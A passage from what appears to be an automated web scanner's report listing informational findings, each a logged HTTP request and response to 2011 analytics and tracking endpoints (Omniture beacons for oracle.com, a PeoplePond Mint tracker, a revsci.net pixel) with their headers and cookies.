GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s55552479997?AQB=1&ndh=1&t=26/1/2011%2017%3A26%3A50%206%20360&g=http%3A//www.oracle.com/index.html&c22=ocom%3Aen%3Ahpdl%3Ajava%20for%20developers&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1437&bh=954&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pe=lnk_o&pev2=ocom%3Aen%3Ahpdl%3Ajava%20for%20developers&pid=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%25&oid=https%3A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingp&ot=A&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:35 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; Expires=Thu, 25 Feb 2016 23:26:35 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; Expires=Thu, 25 Feb 2016 23:26:35 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Fri, 25 Feb 2011 23:26:35 GMT
Last-Modified: Sun, 27 Feb 2011 23:26:35 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D698C2B-63F9-2C9F9C11"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www152
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.365. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s56072562700137  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom/1/H.19.4/s56072562700137

Request

GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s56072562700137?AQB=1&ndh=1&t=26/1/2011%2017%3A25%3A2%206%20360&g=http%3A//www.oracle.com/index.html&r=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24&c20=New&v20=New&c24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24&v24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1437&bh=954&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pid=Dialogue%20Welcome%20Page%3AWWMK09049794MP%3A6804803%3A8810727%3A24&pidt=1&oid=http%3A//www.oracle.com/&ot=A&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:24:48 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; Expires=Thu, 25 Feb 2016 23:24:48 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; Expires=Thu, 25 Feb 2016 23:24:48 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Fri, 25 Feb 2011 23:24:48 GMT
Last-Modified: Sun, 27 Feb 2011 23:24:48 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D698BC0-6974-67972FFA"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www57
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.366. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleotnlive/1/H.19.4/s58862111601047  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oracleotnlive/1/H.19.4/s58862111601047

Request

GET /b/ss/oracleglobal,oracleotnlive/1/H.19.4/s58862111601047?AQB=1&ndh=1&t=26/1/2011%2017%3A26%3A52%206%20360&g=http%3A//www.oracle.com/technetwork/java/javase/downloads/index.html&r=http%3A//www.oracle.com/index.html&cc=USD&c20=New&v20=New&c24=http%3A//www.oracle.com/index.html&v24=http%3A//www.oracle.com/index.html&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1437&bh=954&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pid=http%3A//www.oracle.com/index.html&oid=ocom%3Aen%3Ahpdl%3Ajava%20for%20developers&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/technetwork/java/javase/downloads/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:37 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; Expires=Thu, 25 Feb 2016 23:26:37 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61685013A7B-60000108000102FA|4D698A26[CE]; Expires=Thu, 25 Feb 2016 23:26:37 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Fri, 25 Feb 2011 23:26:37 GMT
Last-Modified: Sun, 27 Feb 2011 23:26:37 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D698C2D-74F3-0AB8465F"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www64
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.367. http://peoplepond.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplepond.com
Path:   /

Request

GET / HTTP/1.1
Host: peoplepond.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:34 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=b452c47d22569f4373c9b3b74c244667; path=/
X-Ua-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
<head>
<meta htt
...[SNIP]...

7.368. http://peoplepond.com/_mint/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplepond.com
Path:   /_mint/

Request

GET /_mint/?record&key=4c39353334326c4c4461673838666744393231667766&referer=&resource=http%3A//peoplepond.com/&resource_title=PeoplePond&resource_title_encoded=0&resolution=1920x1200&flash_version=10&1298824359619&serve_js HTTP/1.1
Host: peoplepond.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=b452c47d22569f4373c9b3b74c244667; MintAcceptsCookies=1

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:32:40 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintUnique=1; expires=Wed, 24-Feb-2021 16:32:40 GMT; path=/; domain=.peoplepond.com
Set-Cookie: MintUniqueHour=1298822400; expires=Sun, 27-Feb-2011 17:00:00 GMT; path=/; domain=.peoplepond.com
Set-Cookie: MintUniqueDay=1298793600; expires=Mon, 28-Feb-2011 08:00:00 GMT; path=/; domain=.peoplepond.com
Set-Cookie: MintUniqueWeek=1298793600; expires=Sun, 06-Mar-2011 08:00:00 GMT; path=/; domain=.peoplepond.com
Set-Cookie: MintUniqueMonth=1296547200; expires=Fri, 04-Mar-2011 08:00:00 GMT; path=/; domain=.peoplepond.com
Set-Cookie: MintCrush=971729925; expires=Sun, 27-Feb-2011 16:39:40 GMT; path=/; domain=.peoplepond.com
Content-Length: 10
Connection: close
Content-Type: text/javascript

/*Minted*/

7.369. http://peoplepond.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplepond.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: peoplepond.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MintUnique=1; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200; MintAcceptsCookies=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 21:35:59 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=a170667773ec2d63371c04e55c62dfc3; path=/
Status: 404 Not Found
X-Ua-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
<head>
<meta htt
...[SNIP]...

7.370. http://pix04.revsci.net/D10889/b3/0/3/noscript.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D10889/b3/0/3/noscript.gif

Request

GET /D10889/b3/0/3/noscript.gif?D=DM_LOC%3Dhttp%253A%252F%252Fbizo.com%253FFAIT%253DT%2526SNEX%253DT%2526INBS%253DT HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series/finance_in_the_21st_century/description
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=1a484aca566591c53c93394519ccf266; rsiPus_0="MLsXrEEucT5zIBH3Qpx+rOCHV9wTIf62V307nImZlEBw76YpcfzcZFr0RWvrtRsL1Wr8YdprMhhJd15eFUYGqJstP2duQv8PkdiB0lhkBml9ADYHA1ooiLCxxE4ZbZ6dBJlUHDgyYQ0dWGNgk2mU/6IWZPFutmXvjkfCaZ8XNFt00xjNbdPTO5Zy3pjFEXPPiN9sqakOxmiPznF2pe+333CVmVWtapVbuhz0jSjKWdMeE2eBsBSvtYkc0fmomYLtyi+Lts1umyzd9z/SrKTmNmTnFBMFArLCfjigahHLEoWhBrWvrSf8IrxyRfMTPFuk5iOzQgPN/kcU9HlxpNtUXKVd6mKr30sFlylIwkI9VjAWygBVrOHtwrSI7YvNNUqNCBU5c3lYOKS3+UBPVKDwLi0H3JXAmFxwbNP3r+5Rck+Pdm9kW/4="; NETSEGS_A09802=3161248fde72e26b&A09802&0&4d85fa5c&0&&4d608f7f&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_J08778=3161248fde72e26b&J08778&0&4d85fa7d&0&&4d6079fc&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_H07710=3161248fde72e26b&H07710&0&4d85ff07&0&&4d608185&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_K05540=3161248fde72e26b&K05540&0&4d86087c&0&&4d60a298&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_I07714=3161248fde72e26b&I07714&0&4d87cbdc&0&&4d6207bf&0383df689f9c2c8ede3ba30f48f38e86; udm_0=MLvvNCMJaSpn3g1VgeeeGzYj5Vhpa0X+RWm0OkSyOoAHLiHCF2aiMSYgQvav5s5BXEH7WYwcF1E2ChHqcXIlcGGzoQLdcDLyMu0y0AA0Z8Ywb39zAGBcUivFd7XrslH4xlWS0JLMFoDGHAkQL7o0hggzHkyvijJhrldtN2/FZ9IbGSBSFXRPil1d8FA8SE9tq8Av2A9P7yxJPBT0R6fbrUmL0oPlHBjObPp63bBa2KCPHlA8U97JgvboTViVooVlgIa+ijmJ7UNvO/hneCdRVmGh2sMbkGByr7B3G3NZLgf2VU0MAK1DLmSuF6v/ZpeNe9qupKNEkk9dX/fUtrqD/eVwLSXygdP/MqbhdS9gMxPvlvexnPgZBq2RLsqflMCLMW/Ug7QgX010f0c5XSERx4iU2hHWhD5UZusAMG/vBszSqMG9E4tznWZMkpS7Pr6KBMnNdmY2TWHmsC3Ai6OjC6sXoW1qf1kRNCJV5Lc3+CtRYEXKUiBZHZmS7gN2G4AXctR3G6S5foI1wyNp0XkgH9gcnoTC/UlM2RTZrDfU3srPWVonhdRi8ZdcMFmAiuTrulA2TDojWoSP939o79qB4DbWBWQlH2DoSPFC/RBM56QVhk3ldDs0KLNc4yMSRLSgl4+ikpPH9GMm5uoAHA2nTYOV6zFc9OgcR9igHW+2yb353Vyg4qNNlP8kR4U7lD9GU0TYYjCPengFG8y/9d4dg4ryRppKiGZpKC72bQZrcdX7lgwSV9w8JeZPW4B8WR5eIJzQ3iVY8AKTRUT66sIpsoLHAF/6Gj+TCF3X+aMdh6sW2cX1+K8qlpZFTOf8RaOgupyEkOy9T/mHOolCQFpAdYRQFMGqh6DUP3cwAZCCT9qNx8x0zRf2gI8+3j+EyoBMURpLP4TBuPZcSgGsPsVyvU8q+Pp+5VqVxmS9YYCIdjINNTf3QhgHE5zh9oiJwasOervR8EwOw1JPuimnazr5nxCaZoNmiNLm3ztI69S5pCpqUVLqDtOgwa2pSABW+O/foe8sKvzUw+f8/STMj441SPBXm90l/wka+279qd1MH/v5PDRz22TctWo5GZb/K/qsI/q0Pu9evZ69mSYGSM/zYB9B8kqeendaGg24bLzNfR1nrrc1dP0YSsMmg4CLBNKOjAb4+vdcWzBFkeEcexFsyMvPVv1IcNJIzArJaQBZJ3Uz1wlEGBe8bq+exaq9P9521+jQ9HmhuTP8/JiI/p+5j0V2M2Qewj5bUUJrU255//Gp7/tKYPxZJ0GkRsfkSQ3EHzOMbDkxZs7yqV7jalN3; NETSEGS_E05516=3161248fde72e26b&E05516&0&4d87cc14&0&&4d61f497&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_B08725=3161248fde72e26b&B08725&0&4d87cc1e&0&&4d61ce1b&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_J05531=3161248fde72e26b&J05531&0&4d87ccbf&0&&4d61e0ee&0383df689f9c2c8ede3ba30f48f38e86; rsi_us_1000000=pUMdIy+nMBYU1H0VO98ITfWXt/S6971faUpj9o8GB6CDMi4HHPf9QBO/YxtzaG4Btfq7DS+xMpVMtrAbGhPzCDt/7wBxQy5tJLHhvQ5DlREoMq2TKyynmwfXEC9pR1BXlkq2Q3PtihbhmVaGuVC+719GI46neUGxsMKbA0Tx+6gWMk3jI54XmlOWm0AmYgKFwW0uLFDV7GoPCG46INlpLwLy5aT7IEK0xE1cp+nAp1zs89uwSenDKmhOYhuROjTzNd5YwCAI3km7UW8OE31b0A6iWWSl9cjvZnB3OBkIX1BlX8OKedBsT70vSbuhoV+QhtOs2ii3gDpF9JuMDiOBr0rXeBYDApujkbStdhRv69MFJFo3gRplJi6NCnno90ESOzd2UKDCIHNvJnHiIti0bwWKFKFbrIEngialv6iMk8YvYo5NZSx3rUlRRDJghVUQwyshP2pcXSa12mjaWppDAj4za03Bk9yaBvCjNMTc/PlyJePgcFpLSe3XvmxuSO755w95zCOiFeexNxbEiQKQEUADRL/jCn1M8CMx7LakeHCxi0XoxPUYxgLEc4B6W4wd9oBLKDopfs9mcVDWaDp3orgx0NoCGD6mU4b17G+ZgefqbFHn3l2zMQ/UEenztLzqd3ApHZJyw8HOh9tX4msrE86FFSbpsTvVFPU1yHL8bEo+qOOquFY241gxUL2t0u8ZlH3gwuGNuishpHbASFOelC4yyWeXxVO7WKIPz+CVOAIPJIOpoqmzqYqc3jYNIbHpfTWIvxWy2NfzvULkU8GOJL3tw2qkeoIoLneFNH8tRex90XIMp1638c96KXmfuU0EhQN3YXwy1FMQXT18HYCKUrWKYvnicW6r2R8YZUuhDa1bq7c0FRnZPHWEa5/v/cWdQg6Vd7Sw3Y+LPZC6jsxyu8oz3Q6jqOkS8tvJUVZ8uisKPOzomgK4djS/cGPPg2bv1jLKT3QAQ4uGUSc+MO3TaI3FtwpgAFbEgBg8kXb8QZIuT41QZsoQuAGRvi7LWXalEQF6RGOTEuoPe63D6WoKRtRBJo1yq5eNvxX3YTVBUPueAurzZpmFpdwT+lkv9cDG12RKU/5U6XmmsseF3KTNIc+DG9E6UURJnGj7RMK5Hft7w6nI/yK+xRU/Kwa04wmodLOdhNE0Jppf3r/8MlfrGAeo5Mqo9Op+DcDkzQj/8zWw0BJFa7r7kf46/DEANvBgLOZCcQ4VS+fIS61WzxAWmXvx3SiXNXN9v/AOXEveKsZZpFG9KrGlBBmQhCZkpOLMH0tDNDNMu1f8er/8o2Xt6aIrmOM2+L0GCjSWK+fCqZBSUBu4x1tm21ARcYhC/4fY/DEfe6CrA0AHUoloChS6861ztQ==; rsi_segs_1000000=pUPF5E+huXIQT7uItGF29/yofum2uvdLfQaqLFjosdn5vw/Z0o0sxA4vKqbOnQTLW4dKiyQzhfTHKDaA8PQ/U/z7lrbx9Fv6aCmyIwU58tXwPxrrUegEUYkkllyNqxqLeA1HplflbM08rUIYMjWxq2ViZU9oxqTjU9kbJvk4R3n8UoOc+1NEROgaXqa9bvHgqZ+giu3d0PMcCMPLVLEpqyS/RxnpE3HeW0GEI4ojl7mS6fRNSddzvTMcyAG9Q732AxqlMAP1OOIbuTSAztFLnu2VKcrgTppdvZeWU9cKelJLRzrZlaF8sj+XqZGDTEmWWJBSDhuPInRY0YE/2rsur4UAsmcO22QdHbjAp5869LEIt1z+rXnb5A8eO+dFsz1TN1jkQz5Vpy4PsKBpGLDCP5O1FjV6N6SsY9BOqHpP0Cls34OHtoTHASuaYVfA6GNkGWNOlBAX+b8XQvNcMc+T13+FgmQEMo4I0mJOYJAK6FuqwvJtAMwFjSb6pTVsvq+r6/SyvhPPHPXK8bD72nnxTv7RfH+09Hy5; rtc_YScy=MLsPt4EKYRpvJ5Eu0psOlXkXl67DhaFY1fv8tZ9IjlRQ5XTqupnlL20nBwSYe5uprHOhQrJ5d8egAfx8j/w0K3Hrh2FvjDREXS73y34qKeOt9RClD2rzkZgTnQq2iZf+2Yqd1/CPfpvSXge4/xcTC2ot7gdpav4AVx4mX/Km6XUqszt6Rp5rKrkTqOfY3a4LHfCD+vD7WWpoS7gIVUBMw0wk1/PV4aLG68a0XS7H9Wb0eTVdN8LF6OTvhO9c2ZHFtGl7DfwbirzKFmW+VGLn8y5RNsR6sJhpgUtx/eClSHgPZFupZYtXM65sRV7Sn2Vfzb4EyzcCDea6moyQLZzgwBuPDM137SN+J0oj1KNw81S0zzh9C5SXHpq9oyV5/d/uqaYO/qbWGByUWOPs4Qkjt7gNRhVD1P9gMgqRyUK1KOj7O4ZdK7ArSWjsiodmJqhzasbj25IL885Y/hyIA+UP3Fv6o8TJQ1LZaZ1ZDeZudJ09RoHiD348HHxd/tZC2ehkBM5+QJaqcwU7KA6RDM7v5OJY7QlRJ2eSuLwG047gSY6iO6wZnErqog0zqo6UfLafao+Rql7YIXxzlfbwdSyihp2zJhiV/hCGX51OOWA6YBvgawgMmrQSH7p0lHq/Gda8QBrqHPe2auPM7ADkv66z5vg9KkkYzPLLXR0CXVcEMluEo1PduCa/e8Fu4ufuN+jx2s/mv0E8BwFKfMIJtQgJE5SV4rd+Mpce4xP389qwmh2tvL7+xf9+MKNZu4dvn9Px98ATz/UU50oZdiyJrBWIRuRJXsS4GaxZariFHQOpy5Usn8NPxSsj2unH8FrNrqWxmTA6qFCaWJmYCza3DhH1NbEfoNrjk6/QZ4vqhoEIOIX6XhP4EKsdvxrnU+4+A9z5tzkICHNaDX6F8qxT3D9JLoH10/20nZFsKIaVNT2yT3hPOUBxoACY7WPgmEBr/SvSINGXEUSh8SWtKklDiT9iJOgZc0nSF2OqQaJ7FDzrWRAFM40l0AEZd9Q1umMHal94wSEz5tTvf6QtgRQUdeXQd4YJh3ooEH1cYV+2TNNyExw0BHkUt+BapZVQT3tijSXXZd5jVG7tpupDUvZsKOK3HcEV7qHlW6WJr9KGMMkPwUoW4eavRpJjSyvfcltikVHonLNmgbWc9NQ0+49wO8it3nISCcTWY6Oq1dJ0NS9Z3zcpZLMxCOJu3uQQUxt7EJ8OjxGbKxQmvENglzJfc0IjjnV37SDsyOKt/ADL0S2FvGAKpSZSzDHo6RbVDvaSB+WYY4yK4Pu518pjdemWKAM2a+nYPZmtlW2RoRCHU4GPKoBz01psWSn0azyDNOzdeJZZfr26IsFBzevuY4w7ok0cpd2KXNbCHnkXiqGaYrAfWHpq+FIKH8MQXXCX46odKKkEVq/DqX4q03mWW7qf6do1KA0WzLTkH0NqM5DSjJNu64rSkHOOr4wQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_YScy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
